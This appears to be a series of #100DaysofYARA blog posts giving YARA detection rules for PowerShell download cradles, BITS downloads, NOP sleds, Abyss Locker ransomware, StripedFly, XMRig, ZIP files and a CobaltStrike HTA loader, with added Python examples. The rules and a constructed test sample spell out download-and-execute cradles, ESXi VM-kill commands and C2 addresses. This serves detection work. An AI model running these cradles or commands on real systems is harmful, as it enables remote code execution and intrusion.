#100DaysofYARA 2024 – Day 51 – PowerShell Download Commands

There are so many ways to obfuscate PowerShell commands that this might seem like a bit of a waste of time, but today’s rule attempts to find simple PowerShell download commands.

rule TTP_PowerShell_Download_command {
	meta:
		description = "Matches strings commonly found in PowerShell download cradles."
		last_modified = "2024-02-20"
		author = "@petermstewart"
		DaysofYara = "51/100"
		ref = "https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters"

	strings:
		$a = "powershell" nocase ascii wide
		$b = "IEX" nocase ascii wide
		$c = "New-Object" nocase ascii wide
		$d = "Net.Webclient" nocase ascii wide
		$e = ".downloadstring(" nocase ascii wide

	condition:
		4 of them
}
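As an added example (my own code, not part of the original post or the author's repository), here is the rule's condition reimplemented in Python so that the effect of the `nocase ascii wide` modifiers can be seen on concrete input, together with the step the rule cannot take on its own: decoding a `-EncodedCommand` argument. Its base64 hides every string except `powershell` until the blob is decoded to UTF-16LE, which is exactly the form the `wide` variants match. The command lines and the `example.com` URL are constructed, and the list of `-EncodedCommand` abbreviations is an assumption.

```python
import base64
import re

# The five strings from the rule above. YARA's "nocase ascii wide" searches each one
# case-insensitively as plain ASCII and as UTF-16LE ("wide").
CRADLE_STRINGS = ["powershell", "IEX", "New-Object", "Net.Webclient", ".downloadstring("]
THRESHOLD = 4  # the rule's "4 of them"

# Common spellings of powershell.exe's -EncodedCommand switch. The list is an
# assumption made for this example and is not exhaustive.
ENCODED_SWITCH = re.compile(
    rb"-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE
)


def string_hits(buf: bytes, needles=CRADLE_STRINGS) -> set:
    """Which needles occur in buf as ASCII or as UTF-16LE, ignoring ASCII case."""
    folded = buf.lower()  # bytes.lower() folds only A-Z, which is what YARA's nocase does
    hits = set()
    for s in needles:
        narrow = s.lower().encode("ascii")
        wide = s.lower().encode("utf-16-le")
        if narrow in folded or wide in folded:
            hits.add(s)
    return hits


def matches_rule(buf: bytes) -> bool:
    """Equivalent of the rule's condition: at least THRESHOLD distinct strings present."""
    return len(string_hits(buf)) >= THRESHOLD


def decode_encoded_command(cmdline: bytes):
    """Return the UTF-16LE bytes carried by a -EncodedCommand argument, or None."""
    m = ENCODED_SWITCH.search(cmdline)
    if m is None:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True)
    except ValueError:  # binascii.Error is a ValueError
        return None


def scan(cmdline: bytes) -> dict:
    """Scan a command line as-is, then again after decoding any -EncodedCommand blob."""
    decoded = decode_encoded_command(cmdline)
    return {
        "raw": matches_rule(cmdline),
        "decoded": matches_rule(decoded) if decoded is not None else False,
    }


# Constructed samples, not captured from real activity; example.com is a reserved name.
INNER = "IEX (New-Object Net.WebClient).DownloadString('http://example.com/a.ps1')"
PLAIN = ("powershell -nop -w hidden -c \"" + INNER + "\"").encode()
ENCODED = b"powershell -nop -w hidden -enc " + base64.b64encode(INNER.encode("utf-16-le"))
BENIGN = b"powershell -Command Get-Process | Out-File procs.txt"

if __name__ == "__main__":
    for name, sample in (("plain", PLAIN), ("encoded", ENCODED), ("benign", BENIGN)):
        print(name, scan(sample))
```

The encoded command line scores only `powershell` in its raw form (the other four strings contain `-`, `.` or `(`, which never occur in base64), so a detection that wants to keep the rule as written has to decode `-EncodedCommand` blobs before scanning them.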

Find the rest of my 100DaysofYARA posts here, and the rules themselves on my Github repository.

#100DaysofYARA 2024 – Day 50 – Bitsadmin Downloads

We’re halfway through the 100 days! Microsoft’s Background Intelligent Transfer Service can be used to proxy execution of binaries or execute from an Alternate Data Stream, but is more commonly used maliciously to download files from an external host.

rule TTP_BITS_Download_command {
	meta:
		description = "Matches strings commonly found when creating new BITS download jobs."
		last_modified = "2024-02-19"
		author = "@petermstewart"
		DaysofYara = "50/100"
		ref = "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/"

	strings:
		$a = "bitsadmin /create" nocase ascii wide
		$b = "/addfile" nocase ascii wide
		$c = "/complete" nocase ascii wide
		$d = "http" nocase ascii wide

	condition:
		all of them
}

#100DaysofYARA 2024 – Day 49 – NOP Sleds

A NOP sled is a run of no-operation instructions placed in front of shellcode so that control landing anywhere in the run slides down into the payload, which makes buffer overflow exploitation tolerant of an imprecise return address. These rules hunt for sequences of 8, 16, and 32 NOP (0x90) bytes; note that the three nest, since any file containing 32 consecutive 0x90 bytes also contains 16 and 8. I have no idea if this is actually an effective method of identifying exploit binaries!

rule HUNT_nopsled_8 {
	meta:
		description = "Matches 8 repeated no-operation hex bytes - 0x90"
		last_modified = "2024-02-18"
		author = "@petermstewart"
		DaysofYara = "49/100"

	strings:
		$a = { 90 90 90 90 90 90 90 90 }

	condition:
		filesize < 5MB and
		$a
}

rule HUNT_nopsled_16 {
	meta:
		description = "Matches 16 repeated no-operation hex bytes - 0x90"
		last_modified = "2024-02-18"
		author = "@petermstewart"
		DaysofYara = "49/100"

	strings:
		$a = { 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 }

	condition:
		filesize < 5MB and
		$a
}

rule HUNT_nopsled_32 {
	meta:
		description = "Matches 32 repeated no-operation hex bytes - 0x90"
		last_modified = "2024-02-18"
		author = "@petermstewart"
		DaysofYara = "49/100"

	strings:
		$a = { 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 }

	condition:
		filesize < 5MB and
		$a
}
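Two points are worth seeing in code: the three rules nest (a 32-byte run of 0x90 contains a 16- and an 8-byte run, so they always fire as a prefix of 8, 16, 32), and a sled need not be made of 0x90 at all, since x86 has multi-byte NOP encodings (`66 90` and the `0F 1F /0` family) that compilers and assemblers also emit as alignment padding. The following is an added example, my own code rather than anything from the post; the byte strings are constructed and the four-byte `STUB` merely stands in for a payload.

```python
# Intel's recommended NOP encodings, 1 to 9 bytes long: 0x90, 66 90 and the 0F 1F /0 family.
NOP_ENCODINGS = sorted([
    b"\x90",
    b"\x66\x90",
    b"\x0f\x1f\x00",
    b"\x0f\x1f\x40\x00",
    b"\x0f\x1f\x44\x00\x00",
    b"\x66\x0f\x1f\x44\x00\x00",
    b"\x0f\x1f\x80\x00\x00\x00\x00",
    b"\x0f\x1f\x84\x00\x00\x00\x00\x00",
    b"\x66\x0f\x1f\x84\x00\x00\x00\x00\x00",
], key=len, reverse=True)  # longest first so the tokenizer below is greedy


def longest_byte_run(data: bytes, value: int = 0x90) -> int:
    """Longest run of one byte value; this is exactly what the 0x90 hex patterns measure."""
    best = cur = 0
    for b in data:
        cur = cur + 1 if b == value else 0
        best = max(best, cur)
    return best


def rule_hits(data: bytes, thresholds=(8, 16, 32)) -> list:
    """Which HUNT_nopsled_N rules would fire. A run of 32 contains runs of 16 and 8,
    so the result is always a prefix of the threshold list: the rules nest."""
    longest = longest_byte_run(data)
    return [t for t in thresholds if longest >= t]


def longest_nop_sled(data: bytes) -> tuple:
    """(offset, length) of the longest stretch that decodes purely as NOP instructions
    of any encoding, found by greedy longest-match tokenizing from each position."""
    best = (0, 0)
    i = run_start = run_len = 0
    while i < len(data):
        for enc in NOP_ENCODINGS:
            if data.startswith(enc, i):
                if run_len == 0:
                    run_start = i
                run_len += len(enc)
                i += len(enc)
                break
        else:  # no NOP encoding starts here: close the current run
            if run_len > best[1]:
                best = (run_start, run_len)
            run_len = 0
            i += 1
    if run_len > best[1]:
        best = (run_start, run_len)
    return best


# Constructed inputs. STUB only stands in for a payload; it is not shellcode.
STUB = b"\x31\xc0\x50\x68"
CLASSIC = b"\x41" * 8 + b"\x90" * 32 + STUB                                    # textbook sled
MIXED = b"\x41" * 8 + (b"\x66\x90" + b"\x0f\x1f\x00") * 6 + b"\x90" * 2 + STUB  # 32-byte sled, only 2 bytes are 0x90
PADDING = b"\xc3" + b"\x90" * 5 + b"\x55\x48\x89\xe5"                          # ret, 5 bytes of alignment, next function

if __name__ == "__main__":
    for name, sample in (("classic", CLASSIC), ("mixed", MIXED), ("padding", PADDING)):
        print(name, "rules:", rule_hits(sample), "sled:", longest_nop_sled(sample))
```

`MIXED` is a 32-byte sled that none of the three rules sees, because its longest run of 0x90 is two bytes; `longest_nop_sled` reports it at the same offset and length as the classic one.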

#100DaysofYARA 2024 – Day 48 – Abyss Locker Ransomware Note

Today’s rule matches strings in the note dropped by the Abyss Locker ransomware, based on analysis published by SentinelOne.

rule MAL_AbyssLocker_ransomnote {
	meta:
		description = "Matches strings found in SentinelOne analysis of Abyss Locker note."
		last_modified = "2024-02-17"
		author = "@petermstewart"
		DaysofYara = "48/100"
		ref = "https://www.sentinelone.com/anthology/abyss-locker/"

	strings:
		$a1 = "Your company Servers are locked and Data has been taken to our servers. This is serious."
		$a2 = "Good news:"
		$a3 = "100% of your Server system and Data will be restored by our Decryption Tool;"
		$a4 = "for now, your data is secured and safely stored on our server;"
		$a5 = "nobody in the world is aware about the data leak from your company except you and Abyss Locker team."
		$a6 = "Want to go to authorities for protection?"
		$a7 = "they will do their job properly, but you will not get any win points out of it, only headaches;"
		$a8 = "they will never make decryption for data or servers"
		$a9 = "Also, they will take all of your IT infrastructure as a part of their procedures"
		$a10 = "but still they will not help you at all."
		$a11 = "Think you can handle it without us by decrypting your servers and data using some IT Solution from third-party non-hackers"

	condition:
		filesize < 5KB and
		8 of them
}

#100DaysofYARA 2024 – Day 47 – Abyss Locker Ransomware (Linux)

According to analysis published by SentinelOne, Abyss Locker has been operating a Linux variant targeting ESXi environments since March 2023. This rule matches strings based on their analysis.

rule MAL_AbyssLocker_Lin_strings {
	meta:
		description = "Matches strings found in SentinelOne analysis of Linux variant of the Abyss Locker ransomware."
		last_modified = "2024-02-16"
		author = "@petermstewart"
		DaysofYara = "47/100"
		ref = "https://www.sentinelone.com/anthology/abyss-locker/"

	strings:
		$a1 = "Usage:%s [-m (5-10-20-25-33-50) -v -d] Start Path"
		$b1 = "esxcli vm process list"
		$b2 = "esxcli vm process kill -t=force -w=%d"
		$b3 = "esxcli vm process kill -t=hard -w=%d"
		$b4 = "esxcli vm process kill -t=soft -w=%d"
		$c1 = ".crypt" fullword
		$c2 = "README_TO_RESTORE"

	condition:
		uint32(0) == 0x464c457f and // "\x7fELF" magic read as a little-endian uint32
		all of them
}

#100DaysofYARA 2024 – Day 46 – StripedFly “Cryptominer”

In October 2023 Kaspersky Labs published a write-up of an interesting Tor-based C2 framework which masqueraded as a cryptominer. I couldn’t find any samples despite Kaspersky’s claim of observing infections in the hundreds of thousands, so this rule is a bit speculative.

rule HUNT_StripedFly {
	meta:
		description = "Matches strings found in Kaspersky Labs analysis of StripedFly malware."
		last_modified = "2024-02-15"
		author = "@petermstewart"
		DaysofYara = "46/100"
		ref = "https://securelist.com/stripedfly-perennially-flying-under-the-radar/110903/"

	strings:
		$a1 = "gpiekd65jgshwp2p53igifv43aug2adacdebmuuri34hduvijr5pfjad.onion" ascii wide
		$a2 = "ghtyqipha6mcwxiz.onion" ascii wide
		$a3 = "ajiumbl2p2mjzx3l.onion" ascii wide
		$b1 = "HKCU\\Software\\Classes\\TypeLib" ascii wide
		$b2 = "uname -nmo" ascii wide
		$b3 = "%s; chmod +x %s; nohup sh -c \"%s; rm %s\" &>/dev/null" ascii wide
		$b4 = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters" ascii wide

	condition:
		(uint16(0) == 0x5a4d or uint32(0) == 0x464c457f) and // MZ (PE) or "\x7fELF" magic
		1 of ($a*) and
		1 of ($b*)
}

#100DaysofYARA 2024 – Day 45 – XMRig

XMRig is an open-source, cross-platform cryptominer, available on GitHub and frequently dropped on compromised web servers following mass-exploitation campaigns. Today’s rule matches strings found in a Windows XMRig sample, which was also flagged up by my generic cryptominer string rule from Day 32.

rule MAL_XMRig_strings {
	meta:
		description = "Matches strings found in XMRig cryptominer samples."
		last_modified = "2024-02-14"
		author = "@petermstewart"
		DaysofYara = "45/100"
		sha256 = "3c54646213638e7bd8d0538c28e414824f5eaf31faf19a40eec608179b1074f1"

	strings:
		$a1 = "Usage: xmrig [OPTIONS]"
		$a2 = "mining algorithm https://xmrig.com/docs/algorithms"
		$a3 = "username:password pair for mining server"
		$a4 = "--rig-id=ID"
		$a5 = "control donate over xmrig-proxy feature"
		$a6 = "https://xmrig.com/benchmark/%s"
		$a7 = "\\xmrig\\.cache\\"
		$a8 = "XMRIG_INCLUDE_RANDOM_MATH"
		$a9 = "XMRIG_INCLUDE_PROGPOW_RANDOM_MATH"
		$a10 = "'h' hashrate, 'p' pause, 'r' resume, 's' results, 'c' connection"

	condition:
		7 of them
}

#100DaysofYARA 2024 – Day 44 – Password-Protected ZIP Files

Most of the ZIP files I have collected recently are password-protected – with a small addition to yesterday’s rule we can flag those up too. Bit 0 of the two-byte general purpose bit flag at offset 6 of a local file header marks that entry as encrypted. The rule reads the flag from the local file header at offset 0 only, so an archive whose first entry is unencrypted and whose later entries are encrypted will not match.

rule file_zip_password_protected {
    meta:
        description = "Finds files that look like password-protected ZIP archives"
        last_modified = "2024-02-13"
        author = "@petermstewart"
        DaysofYara = "44/100"
        ref = "https://en.wikipedia.org/wiki/ZIP_(file_format)"
        ref = "https://twitter.com/tylabs/status/1366728540683599878"

    strings:
        $local_file_header = { 50 4b 03 04 }
        $central_directory_header = { 50 4b 01 02 }
        $end_of_central_directory = { 50 4b 05 06 }

    condition:
        $local_file_header at 0 and
        (uint16(6) & 0x1) == 0x1 and // bit 0 of the general purpose bit flag in the first local file header: entry is encrypted
        $central_directory_header and
        $end_of_central_directory
}
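Added example (my own code, not from the post): the rule’s condition translated to Python next to a walk of the central directory that checks every entry’s local file header, using an archive built in memory with `zipfile` and the encryption bit set by hand on one entry (the data is not actually encrypted; only the flag is set). It shows that the rule fires when the first entry carries the flag and misses an archive where only the second entry does.

```python
import io
import struct
import zipfile

LOCAL_FILE_HEADER = b"PK\x03\x04"
CENTRAL_DIR_HEADER = b"PK\x01\x02"
END_OF_CENTRAL_DIR = b"PK\x05\x06"
ENCRYPTED = 0x1  # bit 0 of the general purpose bit flag


def rule_condition(data: bytes) -> bool:
    """The rule's condition translated literally: it only ever reads the flag at
    offset 6, i.e. the general purpose bit flag of the FIRST local file header."""
    if len(data) < 8 or not data.startswith(LOCAL_FILE_HEADER):
        return False
    flags, = struct.unpack_from("<H", data, 6)
    return (flags & ENCRYPTED) == ENCRYPTED and CENTRAL_DIR_HEADER in data and END_OF_CENTRAL_DIR in data


def walk_entries(data: bytes):
    """Yield (name, central-directory entry offset, local-header offset) for every
    entry, located through the end-of-central-directory record rather than by scanning."""
    eocd = data.rfind(END_OF_CENTRAL_DIR)
    if eocd < 0:
        raise ValueError("no end of central directory record")
    count, _cd_size, cd_offset = struct.unpack_from("<HII", data, eocd + 10)
    pos = cd_offset
    for _ in range(count):
        if data[pos:pos + 4] != CENTRAL_DIR_HEADER:
            raise ValueError("central directory entry expected at offset %d" % pos)
        name_len, extra_len, comment_len = struct.unpack_from("<HHH", data, pos + 28)
        local_offset, = struct.unpack_from("<I", data, pos + 42)
        name = data[pos + 46:pos + 46 + name_len].decode("utf-8", "replace")
        yield name, pos, local_offset
        pos += 46 + name_len + extra_len + comment_len


def encrypted_entries(data: bytes) -> list:
    """Names of all entries whose local file header carries the encryption bit."""
    out = []
    for name, _cd_pos, local_offset in walk_entries(data):
        if data[local_offset:local_offset + 4] != LOCAL_FILE_HEADER:
            raise ValueError("local file header expected for %s" % name)
        flags, = struct.unpack_from("<H", data, local_offset + 6)
        if flags & ENCRYPTED:
            out.append(name)
    return out


def build_archive() -> bytes:
    """Constructed two-entry, uncompressed archive used as the sample input."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("readme.txt", "nothing to see here\n")
        zf.writestr("payload.bin", b"\x00" * 16)
    return buf.getvalue()


def mark_encrypted(data: bytes, name: str) -> bytes:
    """Set the encryption bit on one entry, in both its local header and its central
    directory entry. The content is left alone; this only builds a test input that
    carries the flag the rule keys on."""
    buf = bytearray(data)
    for entry, cd_pos, local_offset in walk_entries(data):
        if entry == name:
            for off in (cd_pos + 8, local_offset + 6):  # flag field in each header
                flags, = struct.unpack_from("<H", buf, off)
                struct.pack_into("<H", buf, off, flags | ENCRYPTED)
            return bytes(buf)
    raise KeyError(name)


ARCHIVE = build_archive()
FIRST_ENCRYPTED = mark_encrypted(ARCHIVE, "readme.txt")
SECOND_ENCRYPTED = mark_encrypted(ARCHIVE, "payload.bin")

if __name__ == "__main__":
    for label, sample in (("plain", ARCHIVE), ("first entry", FIRST_ENCRYPTED), ("second entry", SECOND_ENCRYPTED)):
        print(label, "rule:", rule_condition(sample), "encrypted:", encrypted_entries(sample))
```

Walking from the end-of-central-directory record is also how an unarchiver finds the entries, so it is the check to reach for when the aim is "any encrypted entry" rather than "first entry encrypted".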

#100DaysofYARA 2024 – Day 43 – ZIP Files

I have a lot of ZIP files laying around from collecting malware samples. Today’s rule matches on parts of the file header.

rule file_zip {
    meta:
        description = "Finds files that look like ZIP archives"
        last_modified = "2024-02-12"
        author = "@petermstewart"
        DaysofYara = "43/100"
        ref = "https://en.wikipedia.org/wiki/ZIP_(file_format)"

    strings:
        $local_file_header = { 50 4b 03 04 }
        $central_directory_header = { 50 4b 01 02 }
        $end_of_central_directory = { 50 4b 05 06 }
        
    condition:
        $local_file_header at 0 and
        $central_directory_header and
        $end_of_central_directory
}

#100DaysofYARA 2024 – Day 42 – CobaltStrike HTA Loader

One other aspect of CobaltStrike I hadn’t seen many public YARA rules for is the HTA Beacon loader, so that’s what today’s rule tries to match.

Again, this rule uses YARA’s base64 modifier, which was introduced in YARA 4.0, so it will not compile on older versions. `base64 wide` means the string is converted to UTF-16LE before being base64-encoded, which is the form a PowerShell `-EncodedCommand` argument takes.

rule MAL_CobaltStrike_HTA_loader {
    meta:
        description = "Matches strings found in CobaltStrike HTA loader samples."
        last_modified = "2024-02-11"
        author = "@petermstewart"
        DaysofYara = "42/100"
        sha256 = "2c683d112d528b63dfaa7ee0140eebc4960fe4fad6292c9456f2fbb4d2364680"
        ref = "https://embee-research.ghost.io/malware-analysis-decoding-a-simple-hta-loader/"

    strings:
        $header = "<script>"
        $a1 = "%windir%\\\\System32\\\\"
        $a2 = "/c powershell -w 1 -C"
        $b1 = "-namespace Win32Functions" base64 wide
        $b2 = "[Byte[]];[Byte[]]$" base64 wide
        $b3 = "{Start-Sleep 60};" base64 wide
        $b4 = "[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes(" base64 wide
        $b5 = "\\syswow64\\WindowsPowerShell\\v1.0\\powershell\";iex" base64 wide
        $b6 = "else{;iex \"& powershell" base64 wide

    condition:
        $header at 0 and
        all of them
}
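To see what `base64 wide` actually searches for, the following added example (my own code, not YARA’s implementation and not taken from the sample) derives the three base64 permutations of a string from the base64 spec: because base64 works on 3-byte groups, a string’s encoding depends on whether it begins 0, 1 or 2 bytes into a group, and the characters whose value also depends on the neighbouring bytes have to be dropped. With `wide`, the string is converted to UTF-16LE first, which is why the modifier finds PowerShell text inside an `-EncodedCommand` blob without decoding it. `NEEDLE` is the rule’s `$b1`; the surrounding script fragment is constructed.

```python
import base64


def base64_permutations(s: str, wide: bool = False) -> list:
    """The three substrings a YARA string with the base64 (or base64 wide) modifier
    expands to. For each of the three alignments, prepend that many placeholder bytes,
    encode, then drop the leading and trailing characters that also depend on the
    unknown neighbouring bytes. Derived from the base64 spec, not copied from YARA."""
    raw = s.encode("utf-16-le") if wide else s.encode("ascii")
    perms = []
    for k in range(3):
        enc = base64.b64encode(b"\x00" * k + raw).decode("ascii").rstrip("=")
        head = (0, 2, 3)[k]                          # chars tainted by the k placeholder bytes
        tail = 0 if (k + len(raw)) % 3 == 0 else 1   # last char tainted by whatever follows s
        perms.append(enc[head:len(enc) - tail])
    return perms


def encoded_command(script: str, prefix: str = "") -> str:
    """base64(UTF-16LE(prefix + script)), as powershell -EncodedCommand expects.
    The prefix only shifts where the script lands relative to a 3-byte group."""
    return base64.b64encode((prefix + script).encode("utf-16-le")).decode("ascii")


def find_base64(needle: str, haystack: str, wide: bool = True):
    """Index (0, 1 or 2) of the permutation of needle found in haystack, or None."""
    for i, perm in enumerate(base64_permutations(needle, wide)):
        if perm in haystack:
            return i
    return None


# Constructed script fragment; not taken from the sample referenced by the rule.
NEEDLE = "-namespace Win32Functions"
SCRIPT = "Add-Type -namespace Win32Functions -Name Mem -MemberDefinition $code"

if __name__ == "__main__":
    for prefix in ("", "x", "xy"):
        blob = encoded_command(SCRIPT, prefix)
        print(repr(prefix), "wide:", find_base64(NEEDLE, blob), "ascii:", find_base64(NEEDLE, blob, wide=False))
```

Shifting the script by one or two characters moves the needle to a different alignment and a different permutation matches, while the plain (non-wide) permutations never match a UTF-16LE payload at all, which is why the rule needs both modifiers.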